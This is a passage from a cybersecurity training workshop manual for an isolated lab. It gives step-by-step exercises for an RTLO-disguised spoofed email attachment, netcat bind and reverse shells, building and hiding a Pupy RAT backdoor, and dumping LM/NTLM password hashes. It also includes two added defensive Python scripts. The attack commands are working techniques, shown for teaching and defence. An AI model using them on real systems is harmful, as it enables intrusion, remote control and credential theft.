
Advanced Threat Defense

Cybercrime Operations & Attack Methodologies
Workshop Manual
Copyright © 2019 Trend Micro Incorporated. All rights reserved.

Trend Micro, the Trend Micro t-ball logo, InterScan, VirusWall, ScanMail, ServerProtect, and TrendLabs
are trademarks or registered trademarks of Trend Micro Incorporated. All other product or company
names may be trademarks or registered trademarks of their owners.

Portions of this manual have been reprinted with permission from other Trend Micro documents. The
names of companies, products, people, characters, and/or data mentioned herein are fictitious and are
in no way intended to represent any real individual, company, product, or event, unless otherwise noted.
Information in this document is subject to change without notice.

No part of this publication may be reproduced, photocopied, stored in a retrieval system, or transmitted
without the express prior written consent of Trend Micro Incorporated.

Author: ATD Taskforce

Released: December 19, 2019


Version: 1.1

Table of Contents

Introduction.................................................................................................. 5
About this Book .................................................................................................................... 7
Laboratory Introduction ....................................................................................................... 7
Trend Micro Training Cloud Access ...................................................................................... 7
Virtual Environment ............................................................................................................. 9
User Credentials .............................................................................................................9
Accessing the Virtual Machines ...................................................................................................10

Point of Entry .................................................................................................... 13


Exercise 1: Spoof-Email with malicious Attachment ......................................................................... 15

Command & Control ..........................................................................................23


Exercise 2: TCP Bind Shell ................................................................................................25
Exercise 3: TCP Reverse Shell ......................................................................................... 27
Exercise 4: Remote Access Tool Pupy ..............................................................................28

Lateral Movement ............................................................................................. 35


Exercise 5: View LM and NTLM Password Hashes ................................................................ 37
Exercise 6: Extract Passwords from Hash Dump .................................................................. 42
Exercise 7: ARP Poisoning to sniff FTP traffic ........................................................................46
Exercise 8: Fileless Backdoor with Powershell Empire ......................................................... 53
Exercise 9: Privilege Escalation ........................................................................................ 59
Exercise 10: ARP Poisoning to sniff HTTP(s) traffic ............................................................... 67
Exercise 11: Remote Execution with PsExec ................................................................................72
Exercise 12: Remote Execution with AT ............................................................................... 78
Exercise 13: Remote Execution with WMIC ..................................................................................81
Exercise 14: Remote Port Forwarding and RDP .....................................................................84
Exercise 15: Pass-The-Hash .................................................................................................... 88
Exercise 16: Kerberos Golden Ticket Attack ..........................................................................94

Final Challenge ..............................................................................................99


Lab 1: Perform an APT Attack ........................................................................................................... 101

Appendix A: Optional Activities ........................................................................ 105


A.1 DNS Tunneling....................................................................................................................... 107

Appendix B: Commands & Parameters ................................................................... 113


Netcat .......................................................................................................................................... 115

© 2019 Trend Micro Inc. Confidential - Release Pursuant to NDA - Confidential 3


Advanced Threat Defense - Cybercrime Operations & Attack Methodologies

Pupy ............................................................................................................................................ 115


net............................................................................................................................................... 116
gsecdump ................................................................................................................................... 116
samdump2 .................................................................................................................................. 117
John-The-Ripper ......................................................................................................................... 117
Powershell Empire ............................................................................................................... 118
PsExec .................................................................................................................................. 118
at................................................................................................................................................. 119
schtasks ..................................................................................................................................... 119
wmic ........................................................................................................................................... 119
netsh .................................................................................................................................... 120
wce....................................................................................................................................... 120
mimikatz .................................................................................................................................... 121
dnscat2 ...................................................................................................................................... 121

Appendix C: Table of Contents ......................................................................... 123
Chapter 1: Introduction

Introduction
This chapter gives information about the following items:
• Lab introduction
• Training environment
• Lab Setup
• Credentials
• Accessing the Virtual Machines

It also contains information about any prerequisites, where required.

About this Book


This Workshop Manual accompanies the course Advanced Threat Defense: Cybercrime Operations
& Attack Methodologies.

It only contains the instructions for all exercises and labs discussed throughout this part of the
Advanced Threat Defense course.

Laboratory Introduction
This workshop manual refers to a pre-configured environment which is provided by Certified Trainers
during the course.

As the environment is hosted on the Trend Micro Training Cloud, a host computer with an active
internet connection is required for access.

Be sure to read all the information in this chapter carefully, as it outlines how to access and use the
environment.

Trend Micro Training Cloud Access


As this training makes use of different tools which might compromise the security of live systems, the
virtual machines will have no access to any resources outside of the vApp itself.

In order to access the vApp assigned by the Certified Trainer, follow the guidelines below:
1. Open the invitation email sent from noreply-productcloud@trendmicro.com.
2. Click the link in the invitation email.

TREND MICRO TRAINING CLOUD ACCESS: INVITATION EMAIL EXAMPLE

3. On the “Training Area” page, click the [Enter Training] icon.

TREND MICRO TRAINING CLOUD ACCESS: LIST OF ALL TRAININGS

4. Make sure that the status is [Powered On]. Then click the [Enter Lab View] icon.

If the status is [Powered Off], tick the checkbox (□) on the left and click the ▶ icon.

5. Make sure that the [Lab View] window appears.

TREND MICRO TRAINING CLOUD ACCESS: Lab View

Virtual Environment
The virtual environment contains 4 virtual machines:

CLASS SETUP: VIRTUAL ENVIRONMENT

The following table lists additional information about the virtual machines:

Virtual Machine   Description
Server            Server 2003; used for SMTP, HTTPS and other server functions
Victim            Windows 7 endpoint, used as a Victim for the attack exercises
Attacker          Windows 7 endpoint, used to perform attacks such as sniffing
Ubuntu18          Ubuntu 18 endpoint, used for different attacks such as PupyShell
CLASS SETUP: VIRTUAL MACHINE DESCRIPTIONS

Note: You will notice that not all of the virtual machines used during this part of the Advanced
Threat Defense course are running the latest available operating systems. As attacks most
likely use similar methodologies, such as sniffing network traffic, using older operating
systems will not affect the learning outcome of this course.

User Credentials
The following credentials should be used to log in to each virtual machine:

Virtual Machine / Account   Username          Password
Server                      Administrator     P@ssw0rd
Victim                      ACE202\Victim     N0virus1
Attacker                    ACE202\Attacker   N0virus1
Ubuntu18                    ubuntu            novirus=123
SMB                         SMBUser           SMBPass
FTP                         FtpUser           FtpPass
CLASS SETUP: USER CREDENTIALS

Accessing the Virtual Machines

Note: The screenshots in this section are indicative only; some attributes, such as name, will
depend on the vApp currently assigned to your student account.

1. On the [Lab View] window, make sure the [Status] column for all the virtual machines indicates
Powered On.

ACCESSING THE VIRTUAL MACHINES: OPEN THE VAPP

2. Select the virtual machine you would like to access and click the [Remote Control] icon.

ACCESSING THE VIRTUAL MACHINES: “Remote Control” Icon

3. A screen like the one below appears after the [Remote Control] icon is clicked.

4. The logon screen will appear several seconds after the above screen appears.

Chapter 1: Point of Entry

Point of Entry
This chapter demonstrates an example of the 2nd stage of a typical APT, Point of Entry:
• Sending a spoofed email using a malicious attachment

Exercise 1: Spoof-Email with malicious Attachment


In this exercise, we will be sending a spoofed or fake email that appears valid. This email contains a
malicious attachment that hides behind a harmless-looking file extension, which is made possible through
the use of the Right-to-Left Override (RTLO) character.

> Preparing the Malicious Attachment


1. Access the Training Cloud environment.
See: Introduction > Trend Micro Training Cloud Access on page 7 for details.
2. Open the console window of Attacker.
3. Log in using user Attacker (default password: N0virus1).
See: Introduction > User Credentials on page 9 for details.
4. Open Notepad through Start > All Programs > Accessories.
5. Type in the following and press <Enter> to go to the next line:

demo.screenshot.jpg

6. On the second line, type the following:

gpj.tohsneedemo.scr

7. Place the cursor at the very left of the second line, before the letter g:

PREPARING EMAIL: PREPARING RTLO

8. Right-click the cursor and select Insert Unicode control character > RLO Start of right-to-
left override:

PREPARING EMAIL: PLACING RTLO CHARACTER

9. The text flips horizontally, forming the word rcs.omedeenshot.jpg:

PREPARING EMAIL: TEXT CHANGES WITH RTLO APPLIED

10. Place the cursor between rcs.omed and eenshot.jpg:

PREPARING EMAIL: SET LOCATION FOR LTRO CHARACTER

11. Right-click and select Insert Unicode control character > LRO Start of left-to-right
override.
12. The first half of the text, rcs.omed, flips horizontally again, this time forming
demo.screenshot.jpg:

PREPARING EMAIL: TEXT CHANGES WITH LTRO APPLIED

Using Unicode control characters, we are able to manipulate Windows into displaying the
potentially harmful, executable SCR file as a harmless JPG file.
13. Copy the modified text (second line) to the clipboard.
Copying the text may be tricky, as the cursor will move backwards (right to left) from “g” to
“e” of “eenshot.jpg”. Double-clicking on the line will help select the whole line.
The characters of the file name themselves are not changed; the controls we have inserted
only dictate the direction of the letters, so that Windows knows how to present them to the
user.
14. Open Windows Explorer.
15. Navigate to “C:\Tools”.
16. Right-click on “payload.exe” and select Rename.

17. Select all of the existing text, including the file extension.
Paste the modified text as the new name for the file, making sure the old “.exe” extension is
removed in the process.
When prompted about the new file extension, click on “Yes”:

PREPARING EMAIL: RENAME PAYLOAD.EXE

18. The file will be renamed to gpj.tohsneedemo.scr, but it will be displayed as
demo.screenshot.jpg:

PREPARING EMAIL: FILE RENAMED

19. As the Unicode control characters do not affect some views of Windows Explorer, make sure
that you set the view to List or Details:

PREPARING EMAIL: CHANGE VIEW OF WINDOWS EXPLORER
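As an added example that is not part of the Trend Micro manual, the following Python inspector is what a defender would run over attachment names: it strips the bidi controls to recover the extension Windows actually uses, approximates how an override-only name is displayed, and flags the mismatch. The renderer is a deliberate simplification that handles only RLO/LRO/PDF rather than the full Unicode bidi algorithm, and the executable-extension list is my own.

```python
import os
from typing import Dict, List

# Unicode bidi controls: LRM/RLM, the embedding/override controls and PDF, and the isolates.
BIDI_CONTROLS = {"\u200e", "\u200f", "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
RLO, LRO, PDF = "\u202e", "\u202d", "\u202c"
# Extensions Windows runs on double-click (illustrative list, not exhaustive).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".hta", ".ps1"}


def _flatten(direction: str, items: List[str]) -> str:
    """Lay out one override run: an RLO run shows its items in reverse order."""
    return "".join(reversed(items) if direction == "R" else items)


def render_overrides(name: str) -> str:
    """Approximate what a bidi-aware UI shows for a name using only RLO/LRO/PDF.

    Each override opens a nested run; a nested run is laid out on its own and then
    treated as a single unit by the run that contains it. This is a simplification
    of UAX #9 that is sufficient for the override-only trick built in the exercise.
    """
    stack = [("L", [])]                      # paragraph direction is left-to-right
    for ch in name:
        if ch in (RLO, LRO):
            stack.append(("R" if ch == RLO else "L", []))
        elif ch == PDF and len(stack) > 1:
            direction, items = stack.pop()
            stack[-1][1].append(_flatten(direction, items))
        elif ch not in BIDI_CONTROLS:
            stack[-1][1].append(ch)
    while len(stack) > 1:                    # unterminated overrides end with the string
        direction, items = stack.pop()
        stack[-1][1].append(_flatten(direction, items))
    return _flatten("L", stack[0][1])


def inspect_filename(name: str) -> Dict[str, object]:
    """Report the real extension, the displayed name and whether the two disagree."""
    controls = [f"U+{ord(c):04X}" for c in name if c in BIDI_CONTROLS]
    logical = "".join(c for c in name if c not in BIDI_CONTROLS)
    real_ext = os.path.splitext(logical)[1].lower()      # what Windows uses to pick a handler
    displayed = render_overrides(name)
    shown_ext = os.path.splitext(displayed)[1].lower()   # what the user believes they see
    return {
        "real_extension": real_ext,
        "displayed_name": displayed,
        "bidi_controls": controls,
        "extension_mismatch": real_ext != shown_ext,
        # Flag names that both carry bidi controls and really end in an executable type.
        "suspicious": bool(controls) and real_ext in EXECUTABLE_EXTS,
    }


def escape_controls(name: str) -> str:
    """Make the controls visible in a log line or alert instead of letting them render."""
    return "".join(f"<{ord(c):04X}>" if c in BIDI_CONTROLS else c for c in name)


def scan_names(names: List[str]) -> List[str]:
    """Return the names that inspect_filename() flags as suspicious."""
    return [n for n in names if inspect_filename(n)["suspicious"]]


if __name__ == "__main__":
    # Constructed sample: the attachment name built in the exercise, in logical order.
    crafted = RLO + "gpj.tohsnee" + LRO + "demo.scr"
    for n in ["report.pdf", "demo.screenshot.jpg", crafted]:
        r = inspect_filename(n)
        print(f"{escape_controls(n):40} shown as {r['displayed_name']!r:25} "
              f"real ext {r['real_extension']!r} suspicious={r['suspicious']}")
```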

> Send a spoofed Email


1. Still on the Attacker machine, open Mozilla Thunderbird. Enter the password for the Attacker
account when prompted.
2. On the Mozilla Thunderbird window, click the account of Attacker in the left pane.

SENDING EMAIL: ACCOUNT SELECTION

3. On the Accounts section, select View settings for this account:

SENDING EMAIL: VIEWING ACCOUNT SETTINGS

4. Click Outgoing Server (SMTP):

SENDING EMAIL: OUTGOING MAIL SERVER SETTINGS

5. Click “Edit” and set the Authentication method to “No Authentication”:

SENDING EMAIL: CONFIRM SMTP SETTINGS

Note: For testing purposes, Security and Authentication options are not enforced in this
environment.

6. Click “OK”.
7. On the Account Settings, click the Attacker mailbox at the top of the list and select Manage
Identities > Add.
8. Specify boss@your.company.com as email address and click “OK”.

SENDING EMAIL: SPOOFING EMAIL SENDER

Ensure that the Outgoing Server (SMTP) is the correct one, as seen in step 5.
9. Close all pop-ups and start composing a new email by clicking on “Write”.
Specify the following details:
From: boss@your.company.com
To: Victim@ACE202.TrendMicro
Subject: Demo Screenshot
Body:
Please check the attached screenshot.

Regards,
Boss
10. Click “Attach” and attach the modified demo.screenshot.jpg from the “Tools” folder.

SENDING EMAIL: ATTACHING MALICIOUS FILE

Note that the real filename of the attachment will still be displayed by the email client.
11. Click on “Send”.

12. Switch to the Victim machine to check the email we have sent.
13. Open Mozilla Thunderbird. Enter the password for the Victim account when prompted.
14. Mozilla Thunderbird automatically sends and receives emails on launch.
If it does not retrieve messages automatically, click the “Get Mail” button. The test email we
sent from the Attacker machine should appear in the Inbox:

SENDING EMAIL: MALICIOUS EMAIL RECEIVED

15. Save the attachment of the email to the “Downloads” folder.

SENDING EMAIL: SAVING ATTACHMENT

16. Open a command prompt and navigate to the user's temp folder:

cd %temp%

17. List the content of the user's temp folder using the command:

dir

Take note of the files inside the folder.


18. Since we have not run the downloaded attachment yet, there should not be anything
suspicious in the user’s temp folder:

SENDING EMAIL: CONFIRMATION OF NO MALICIOUS FILES IN %TMP%

19. Open Windows Explorer and navigate to the “Downloads” folder.


20. Double-click the demo.screenshot.jpg file:

SENDING EMAIL: OPEN MALICIOUS FILE

A normal image will open in the Windows Photo Preview application. This is the behavior the
user expects. Behind the scenes, however, the user is not aware that the executable we have
sent is also capable of doing other things, including dropping a malicious payload.
21. Go back to the command prompt and display the contents of the user's temp folder again:

dir

This time, a Successful_Attack.txt file is listed. This is the payload of our executable file,
which proves our attack was successful. In real attack scenarios, this could be another
malicious executable rather than a “.txt” file.

Chapter 2: Command & Control

Command & Control


Referring to the 3rd stage of a typical APT attack, this chapter details the following
attack methodologies:
• TCP Bind & TCP Reverse Shell
• Remote Access Tools

Exercise 2: TCP Bind Shell


A bind shell is a type of shell in which the Attacker establishes a connection to the Victim machine, which is listening for it.
1. Open the console window of Victim.
2. Click on Start > Run and type cmd to open a command prompt.
3. On the command prompt, type the following command to set up Netcat as a bind shell:

nc -lvp 4444 -e cmd.exe

Netcat (nc) has been added to “c:\windows\system32”, so we can run the application from
anywhere in the command line.

Note: Refer to the Appendix B.1 on page 113 for additional information on Netcat parameters.

4. This will start Netcat, which will listen on port 4444 and pass on cmd.exe to the remote host once
a connection is established:

TCP BIND SHELL: START NETCAT

Note: At this stage, anyone who connects to the Victim machine on port 4444 will be able to
receive shell access on the target.

5. Switch to Attacker machine.


6. Launch a command prompt and run the following command to connect to the Victim’s IP address
and port:

nc -nv 192.168.100.121 4444

As mentioned above, this command will give us shell access to the Victim machine.
7. Type the following command:

ipconfig

8. As a result, the IP configuration of the Victim machine should be displayed, as we’re running the
command directly on a command prompt on the Victim machine:

TCP BIND SHELL: ESTABLISHED CONNECTION WITH CMD PASSED THROUGH

9. Close the command prompt on both the Attacker and the Victim machine.

Exercise 3: TCP Reverse Shell


In this exercise, we will demonstrate a reverse shell using Netcat. With a reverse shell, as opposed to
a bind shell, the Victim machine initiates the connection and hands a command shell to a listening host.
1. Open the console window of the Attacker machine.
2. Open a command prompt and use the following command to set up Netcat to listen for an incoming
shell:

nc -lvp 4444

3. Switch to the Victim machine.


4. Launch a command prompt window and establish a communication with the Attacker machine
using the command:

nc -nv 192.168.100.111 4444 -e cmd.exe

5. This command establishes communication with the Attacker machine on port 4444 and passes
on cmd.exe to the Attacker:

REVERSE SHELL: COMMUNICATION ESTABLISHED

6. Switch to the Attacker machine.


7. Notice that the communication has been successfully established, and the Victim’s command
prompt has been started. Run the command:

ipconfig

8. We can see that “ipconfig” displays Victim's IP address from the Attacker's command prompt:

REVERSE SHELL: SUCCESSFUL COMMAND EXECUTION ON VICTIM

9. Close the command prompt window on both the Attacker and the Victim machine.

Exercise 4: Remote Access Tool Pupy


In this exercise, we will be using a RAT (Remote Access Tool) called “Pupy” to control a Victim
machine.

Pupy is an open-source, cross-platform, multi-function RAT and post-exploitation tool mainly written
in Python. Pupy can reflectively migrate into other processes.
1. Log in to the Ubuntu machine (default user: ubuntu, password: novirus=123).
2. Right-click on the Desktop and select Open Terminal.
3. Navigate to the directory of Pupy:

cd pupy/pupy

Note: As commands in Linux operating systems, such as Ubuntu, are case-sensitive, be sure to type
all commands exactly as shown in this manual.

Refer to Appendix B.2 on page 113 for references on the Pupy command set.

4. Type the following command to create “backdoor.exe”, which will be used as a remote client
capable of connecting back to the Ubuntu machine:

sudo ./pupygen.py -A x64 -f client -o /home/ubuntu/winshare/backdoor.exe connect --host 192.168.100.151

Enter the password of ubuntu again once requested.


5. Once the command is executed, it will start building the “backdoor.exe”:

PUPY RAT: CREATE BACKDOOR.EXE

6. In order to receive any communication from a client running the “backdoor.exe”, we will need to
create a listener, waiting for incoming connections. Run the following command:

sudo ./pupysh.py

7. This will start the Pupy shell:

PUPY RAT: SHELL STARTED, AWAITING INCOMING CONNECTIONS

Once “backdoor.exe” is executed on a Victim machine, it will establish a shell session back to the
Pupy shell.
8. Switch to Victim machine.
9. Select Start > Run and type the following path to connect to the SMB share where the
“backdoor.exe” is stored:

\\192.168.100.151\winshare

10. From the “winshare” folder, copy the backdoor.exe to the desktop of the Victim machine.
11. Close or minimize the Windows Explorer window.
12. Execute the backdoor.exe.
13. You will notice that there is no graphical interface for backdoor.exe. To confirm it is running,
right-click anywhere on the taskbar and select Start Task Manager.
14. In the Task Manager window, click on the tab “Processes”.
15. The backdoor.exe will be listed as running:

PUPY RAT: TASK MANAGER SHOWS BACKDOOR.EXE RUNNING

16. Switch to the Ubuntu machine.

17. In the Pupy shell window you can see the “Session 1 opened...”, displaying the IP address of the
Victim.
This proves the connection between Ubuntu and Victim machine has been established
successfully:

PUPY RAT: PUPY SHELL HAS RECEIVED COMMUNICATION

18. To see the list of available commands, type the command:

help

19. Type the following command to get more info about the current session:

info

20. This will display different items, such as the registered user name and host name belonging to
the Victim machine:

PUPY RAT: INFO OUTPUT

21. Try to get shell access (command prompt) to the Victim machine with the command:

shell

This will launch the command prompt from the Victim machine:

PUPY RAT: SHELL ACCESS

22. Confirm this is the command prompt of the Victim machine with the command:

hostname

This will display the host name of PC-Victim.

23. Type the command:

ipconfig

This command shows the IP configuration of the Victim machine. Both commands prove that we
currently have shell access on the target machine.
24. Leave the command prompt of the Victim using the command:

exit

The connection with the Victim machine stays open, the “exit” command only closes the remote
command prompt.
25. Open notepad.exe on the Victim using exec command:

exec notepad.exe

As notepad.exe is a graphical tool, there will be no output to display on the terminal.


26. To confirm Notepad has been launched, switch to the Victim machine.
27. Notepad should have been executed successfully. Close Notepad.
28. For the next step of migrating the process into a system process, confirm that backdoor.exe is
still running on the Victim machine using the Task Manager.
29. Switch back to the Ubuntu machine.
30. To migrate the backdoor.exe process to a different process, explorer.exe, run the following
command:

migrate -p explorer.exe

When done properly, this allows malicious code to hide within “normal” processes.
31. Once the process is migrated into explorer.exe, we can see that another session has opened while
the original session was automatically closed:

PUPY RAT: MIGRATION SUCCESSFUL, NEW SESSION CREATED

This is normal behavior, as the process itself has been changed and the communication needed
to be re-established.
32. Switch to the Victim machine.

33. In Task Manager, “backdoor.exe” should no longer be listed:

PUPY RAT: BACKDOOR.EXE NOT SHOWN IN TASK MANAGER

34. In Task Manager, click View > Select Columns.


35. Tick the box for PID:

PUPY RAT: TASK MANAGER COLUMN SELECTION

36. Click “OK”.


37. Take note of the value of PID for “explorer.exe”, as the Process ID will be different for each
machine:

PUPY RAT: EXPLORER.EXE PID

38. Switch to the Ubuntu machine.


39. Get the process ID of the current session using the command:

getpid

40. The output should be the same as the PID shown on the Task Manager in step 38:

PUPY RAT: PID OF CURRENT SESSION

We have now confirmed that we have successfully migrated “backdoor.exe” into the explorer.exe
process, making the application not obviously visible.
41. Get the Session ID by typing the command:

sessions

42. Kill the session using the Session ID received in step 41 - in our example the Session ID is “1”:

sessions -k 1

43. Close the terminal.

Chapter 3: Lateral Movement

Lateral Movement
This chapter, supporting the 4th stage of a typical APT attack, demonstrates
the following methodologies:
• Retrieving Password Hashes: LM & NTLM
• Cracking Password Hashes
• Performing ARP Poisoning
• Fileless Attacks
• Privilege Escalation
• Other infiltration possibilities: psexec, at, wmic
• Remote Port Forwarding
• Authentication using Pass-the-Hash
• Kerberos Golden Ticket Attack

Exercise 5: View LM and NTLM Password Hashes


In this exercise, we will be inspecting the hashes of a user account's password. The exercise
focuses on understanding the basics of LM and NTLM hashes.

> Hashes on Windows 2003: gsecdump


1. Access the Server machine.
If you receive a warning about a failed service, dismiss the message by clicking “OK”.
2. Open a command prompt.
3. On the command prompt, navigate to the Tools folder:

cd \tools

4. Create a new user account named test, with no password:

net user test /add

If the command is executed properly, the message "The command completed successfully."
will appear.

Note: Refer to Appendix B.3 on page 114 for more information about the net command.

5. View the hashes of the newly created account test using gsecdump-v2b5.exe:

gsecdump-v2b5.exe -s | findstr /c:"test"

Note: Refer to Appendix B.4 on page 114 for more information on gsecdump parameters.

6. Since we did not set a password for this account, the hashes for the test account appear as:

aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

7. View the hashes of the built-in Guest account using the command:

gsecdump-v2b5.exe -s | findstr /c:"Guest"

8. Take note of the LM and NTLM hashes for the Guest account, which does not require a
password to log in. They are exactly the same as the ones from the newly created test
account:

LM & NTLM HASHES: HASHES OF EMPTY PASSWORDS

9. Set “Trend” as the password for the test account:

net user test Trend

10. View the hashes of the test account again, to confirm the changes:

gsecdump-v2b5.exe -s | findstr /c:"test"

11. Compare the previous password hashes with the new ones. Both the LM and the NTLM
hashes should have been updated with the following:

8dc75c53a8482736aad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569

At first glance, the hashes are completely different; however, upon looking closely, the
second 16 characters of the LM hash have the value "aad3b435b51404ee", which is identical to
the second 16 characters of the blank password's LM hash.
12. Change the password of the test account to an all-capital "TREND":

net user test TREND

13. View the updated hashes again:

gsecdump-v2b5.exe -s | findstr /c:"test"

14. Compare the hash of the passwords "Trend" with the all-capital "TREND". You will notice that
the NTLM hash changed but the LM hash remained the same. This shows that the LM hash is
not case-sensitive:

LM & NTLM HASHES: LM HASH CASE-INSENSITIVE

15. Change the password of the test account to use the 14-character password
"_Trend__Trend_":

net user test _Trend__Trend_

Ensure to type two underscore (_) symbols in between "Trend".


16. View the hashes of the test account:

gsecdump-v2b5.exe -s | findstr /c:"test"



Lateral Movement

17. The LM hash has a 14-character restriction and Windows calculates the LM hash by dividing
the password into two 7-character halves. In this example, the password "_Trend__Trend_" is
divided into "_Trend_" and another "_Trend_". By looking at the LM hash, you will notice that
the hash for the 7 characters repeats:

LM & NTLM HASHES: LM HASH 7 CHARACTER SPLIT

The hash for "_Trend_" is "1a01f628ff51c0eb", so the hash for "_Trend__Trend_" becomes
"1a01f628ff51c0eb1a01f628ff51c0eb".
18. Change the password of the test account to "_Trend__Trend_ABCDEFGH":

net user test _Trend__Trend_ABCDEFGH

This new password has more than 14 characters, which exceeds the LM hash limit.
19. View the hashes of the test account again:

gsecdump-v2b5.exe -s | findstr /c:"test"

20. The LM hash will look familiar: it is the same as the LM hash of a blank password. This
means that when a password exceeds the 14-character limit, the NTLM hash is calculated but
no LM hash is stored:

LM & NTLM HASHES: LM HASH 14 CHARACTER LIMITATION

21. Delete the test account for the next activity:

net user test /delete


> Hashes on Windows 7: samdump2


1. Access the Attacker machine.
2. Click on Start and type cmd.
3. Right-click cmd.exe and select Run as Administrator to open an elevated command prompt.
4. Navigate to the “samdump2” folder inside the Tools directory:

cd \tools\samdump2

5. Create a new user account named test with "Trend" as its password:

net user test Trend /add

6. View the hashes of the test account using samdump2.exe:

samdump2.exe -l | findstr /c:"test"

Note: Refer to Appendix B.5 on page 115 for more information about samdump2 parameters.

7. The LM and the NTLM hashes should have the following values:

aad3b435b51404eeaad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569

8. If you remember from the previous activity, if the password is set to "Trend", the hashes
change to this value:

8dc75c53a8482736aad3b435b51404ee:0c9743903053f0ccf71fd4938d2c3569

Comparing these two results, we can see that the NTLM hashes are the same but the LM
hashes are not. The LM hash in this exercise has the same value as that of a blank password.
This is due to a local security policy in Windows 7, which is enabled by default.
9. To change this security policy, click on Start and type secpol.msc. This will open the Local
Security Policy Management Console.
10. Expand Security Settings > Local Policies > Security Options in the left panel:

LM & NTLM HASHES: LOCAL SECURITY POLICY MANAGEMENT


11. Double-click on Network security: Do not store LAN Manager hash value on the next
password change in the list of settings.
12. You will see that this policy is enabled by default. This causes the LM hash to appear as that
of a blank password:

LM & NTLM HASHES: SECURITY POLICY ON WINDOWS 7 PREVENTING LM HASH BEING STORED

13. Switch back to the Server machine.


14. Open the Local Security Policy Management Console using the command secpol.msc.
15. Expand Security Settings > Local Policies > Security Options.
16. Double-click on Network security: Do not store LAN Manager hash value on the next
password change in the list of settings.
On Windows 2003, this policy is disabled by default. Because this policy is not enabled, we
were able to view the LM hash on our previous activities.

Note: Do not enable this policy on the Windows 2003 server, as this would cause the follow-up
exercises to fail.

17. Switch back to the Attacker machine.


18. Delete the test account:

net user test /delete
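
The hash values compared in the two activities above (the blank password, "Trend" versus "TREND", and the Windows 7 policy that suppresses LM storage) can be reproduced and audited offline. The following Python script is an added example and is not part of the workshop manual or of the gsecdump/samdump2 tools: it implements MD4 (RFC 1320) in pure Python, computes the NT hash as MD4 over the UTF-16LE password, and audits a constructed pwdump-style dump for blank passwords, for accounts that still have an LM hash stored, and for the "second half empty" pattern that reveals a password of 7 characters or fewer. The dump lines and the RIDs 1005 and 1008 are constructed (501 is the well-known Guest RID); the LM hash for "Trend" and the blank-password values are the ones shown in the exercise.

```python
"""Recompute NT hashes and audit a hash dump for weak LM/NTLM storage.

Added example for the exercise above; not code from the workshop manual.
The NT (NTLM) hash is MD4 over the UTF-16LE encoding of the password, with
no salt, which is why identical passwords yield identical hashes on every
machine and why rainbow tables work against them.
"""
import struct

MASK32 = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"    # LM hash of a blank password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"    # NT hash of a blank password


def _rotl(x, n):
    x &= MASK32
    return ((x << n) | (x >> (32 - n))) & MASK32


def _md4_round(state, words, func, order, shifts, const):
    """One MD4 round: 16 steps cycling through the a/d/c/b register slots."""
    for i, k in enumerate(order):
        t = (-i) % 4                       # slot being updated (a, d, c, b, ...)
        x, y, z = (state[(t + j) % 4] for j in (1, 2, 3))
        state[t] = _rotl(state[t] + func(x, y, z) + words[k] + const, shifts[i % 4])


def md4(data: bytes) -> bytes:
    """MD4 digest per RFC 1320 (pure Python; hashlib's md4 is often disabled)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        st = [a, b, c, d]
        _md4_round(st, words, f, range(16), (3, 7, 11, 19), 0)
        _md4_round(st, words, g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15),
                   (3, 5, 9, 13), 0x5A827999)
        _md4_round(st, words, h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15),
                   (3, 9, 11, 15), 0x6ED9EBA1)
        a, b, c, d = ((v + w) & MASK32 for v, w in zip((a, b, c, d), st))
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash as shown by gsecdump/samdump2: MD4(UTF-16LE(password)), unsalted."""
    return md4(password.encode("utf-16-le")).hex()


def audit_dump(dump: str) -> dict:
    """Flag weak storage in pwdump-style lines 'user:rid:lm:nt:::'."""
    findings = {}
    for line in dump.splitlines():
        if not line.strip():
            continue
        user, _rid, lm, nt = line.split(":")[:4]
        lm, nt = lm.lower(), nt.lower()
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank password")
        elif lm != EMPTY_LM:
            issues.append("LM hash stored")             # LM storage policy not enabled
            if lm[16:] == EMPTY_LM[:16]:
                issues.append("password is 7 characters or fewer")   # second LM half empty
        else:
            issues.append("no LM hash stored")          # policy enabled or password > 14 chars
        findings[user] = issues
    return findings


# Constructed sample dump (RIDs 1005/1008 are made up; 501 is the well-known Guest RID).
# Line 2 reuses the LM hash the exercise shows for "Trend"; the NT hashes are computed here.
SAMPLE_DUMP = "\n".join([
    f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",
    f"test1:1005:8dc75c53a8482736aad3b435b51404ee:{nt_hash('Trend')}:::",
    f"test4:1008:{EMPTY_LM}:{nt_hash('_Trend__Trend_ABCDEFGH')}:::",
])

if __name__ == "__main__":
    print("NT('')      =", nt_hash(""))
    print("NT('Trend') =", nt_hash("Trend"), " NT('TREND') =", nt_hash("TREND"))
    for user, issues in audit_dump(SAMPLE_DUMP).items():
        print(f"{user:6} -> {', '.join(issues)}")
```

Running the script prints the NT hash of the empty password, which matches the blank-password value shown in step 6 above, and two different hashes for "Trend" and "TREND", confirming that only the LM half is case-insensitive. The audit reports Guest as having a blank password, test1 as still storing an LM hash (so the "Do not store LAN Manager hash value" policy is not in effect on that host) with a password of at most 7 characters, and test4 as having no LM hash at all.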


Exercise 6: Extract Passwords from Hash Dump


In this exercise, we will be using Rainbow Table and Brute Force techniques to extract the passwords
from a local hash dump.

> Creating User Credentials and Dumping the Hashes


1. Access the Server machine.
2. Open a command prompt.
3. Navigate to the “Tools” folder if you are not there yet:

cd \tools

